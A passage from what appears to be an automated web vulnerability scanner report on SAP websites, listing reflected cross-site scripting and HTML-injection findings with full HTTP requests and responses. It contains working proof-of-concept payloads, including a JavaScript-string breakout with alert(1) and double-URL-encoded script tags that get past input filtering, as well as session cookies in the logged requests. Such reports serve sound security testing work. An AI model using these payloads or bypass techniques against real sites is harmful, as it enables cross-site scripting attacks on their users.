SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33749
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:35:09 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
vRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut1d1c0"><a>a6b35360b1d" method="post" class="loginform" accept-charset="ISO-8859-1">
...[SNIP]...

3.130. https://www.sme.sap.com/irj/sme/cpslogon [SAMLRequest parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The value of the SAMLRequest request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74723"><a>f29ab74680 was submitted in the SAMLRequest parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D74723"><a>f29ab74680&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response (redirected)

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33748
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:34:56 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
q2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D74723"><a>f29ab74680&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut" method="post" class="loginform" accept-charset="ISO-8859-1">
...[SNIP]...

3.131. https://www.sme.sap.com/irj/sme/cpslogon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45e84"><a>2f50f453e03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut&45e84"><a>2f50f453e03=1 HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

Response (redirected)

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33752
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:35:23 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
RFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut&45e84"><a>2f50f453e03=1" method="post" class="loginform" accept-charset="ISO-8859-1">
...[SNIP]...

3.132. https://www.sme.sap.com/irj/sme/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a93"><a>335e6fbb19b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sme/logon?a7a93"><a>335e6fbb19b=1 HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MUYtMTMzMDdGRkVBMDYtQkMwRUU0NjA4RUM1NjNEQg==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; PortalAlias=sme; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/e043c818-7a27-2c10-ef93-f9f8fc0ce2da
Expires: 0
Content-Length: 33788
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:34:19 GMT
Connection: keep-alive
Set-Cookie: PortalAlias=sme; Path=/; secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<select onchange="location.href='/irj/sme/logon?a7a93"><a>335e6fbb19b=1&language='+document.forms['languageform'].elements[0].value">
...[SNIP]...

3.133. https://www.sme.sap.com/irj/sme/memberlogin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.sme.sap.com
Path:   /irj/sme/memberlogin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcb60"><a>b8c345a2d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1 HTTP/1.1
Host: www.sme.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
SDN_RES_KEY: /webcontent/uuid/606e87a0-0e29-2c10-7fbe-8c8c4607a1c4
Expires: 0
Date: Sat, 15 Oct 2011 15:05:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sme; Path=/; secure
Content-Length: 33403

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<select onchange="location.href='/irj/sme/memberlogin?dcb60"><a>b8c345a2d48=1&language='+document.forms['languageform'].elements[0].value">
...[SNIP]...

3.134. https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b04'%3balert(1)//13edec9a65 was submitted in the Referer HTTP header. This input was echoed as e6b04';alert(1)//13edec9a65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=e6b04'%3balert(1)//13edec9a65
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:34:41 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:34:41 GMT; path=/
Set-Cookie: CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3de6b04%27%3balert(1)%2f%2f13edec9a65; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:34:41 GMT; path=/
Set-Cookie: CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:34:40 GMT
Content-Length: 148683


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script language="
...[SNIP]...
<script language="javascript" type="text/javascript">var T_T = 'PAGE';var T_L = 'Registration Page';var T_V = '';var T_C = 'CRM-US11-XEC-CS11TRIAL';var T_R='http://www.google.com/search?hl=en&q=e6b04';alert(1)//13edec9a65';TrackInteraction();</script>
...[SNIP]...

3.135. https://www.sap.com/sme/contactsap/index.epx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df was submitted in the Referer HTTP header. This input was echoed as fd26d"><script>alert(1)</script>85fde43dbf4c2d2df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sme/contactsap/index.epx?renderableItem=%2Fshow%2F10 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Host: www.sap.com
Connection: Keep-Alive
Cache-Control: no-cache
Referer: http://www.google.com/search?hl=en&q=fd26d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85fde43dbf4c2d2df

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:27:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:27:37 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3dfd26d%252522%25253e%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253e85fde43dbf4c2d2df; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:27:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:27:38 GMT
Content-Length: 87820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="/search?hl=en&q=fd26d"><script>alert(1)</script>85fde43dbf4c2d2df" onmouseover="window.status='Cancel';return true;" onmouseout="window.status='';return true;">
...[SNIP]...

3.136. https://www.sap.com/sme/contactsap/index.epx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37f8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed84849f1e63 was submitted in the Referer HTTP header. This input was echoed as 37f8e"><script>alert(1)</script>d84849f1e63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=37f8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed84849f1e63
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
